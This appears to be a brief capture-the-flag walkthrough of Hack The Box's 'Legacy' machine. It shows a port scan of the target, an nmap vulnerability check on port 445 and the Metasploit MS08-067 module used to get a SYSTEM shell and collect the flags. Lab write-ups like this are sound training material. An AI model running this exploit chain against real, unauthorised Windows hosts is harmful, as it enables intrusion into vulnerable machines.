Capture The FlagsHackTheBox

Hack the Box – Legacy Walkthrough

Today we’re going to solve another CTF machine “Legacy”. It is now retired box and can be accessible if you’re a VIP member.



  • Target OS: WIndows
  • Services: netbios-ssn, microsoft-ds, ms-wbt-server
  • IP Address:
  • Difficulty: Easy


  • 445: MS08-67


  • Getting user
  • Getting root


As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

host        port  proto  name           state   info
----        ----  -----  ----           -----   ----  139   tcp    netbios-ssn    open    Microsoft Windows netbios-ssn  445   tcp    microsoft-ds   open    Windows XP microsoft-ds  3389  tcp    ms-wbt-server  closed

Mainly in many origination port serious from 135 to 139 are blocked in network for security reasons, therefore port 445 is used for sharing data in network.  Now identify whether it is vulnerable to MS08-67 using nmap as show in given image.

nmap --script vuln -p445 -Pn

We found our host is vulnerable to MS08-67, and we can easily exploit the target..


So we’re gonna use metasploit module and exploit this vulnerability.

Module: exploit/windows/smb/ms08_067_netapi

use exploit/windows/smb/ms08_067_netapi

And we got our shell and we’re already NT Authority .

User:  C:\Documents and Settings\john\Desktop\user.txt​

Root: C:\Documents and Settings\Administrator\Desktop\root.txt

Noor Qureshi

Experienced Founder with a demonstrated history of working in the computer software industry. Skilled in Network Security and Information Security.

Related Articles

Back to top button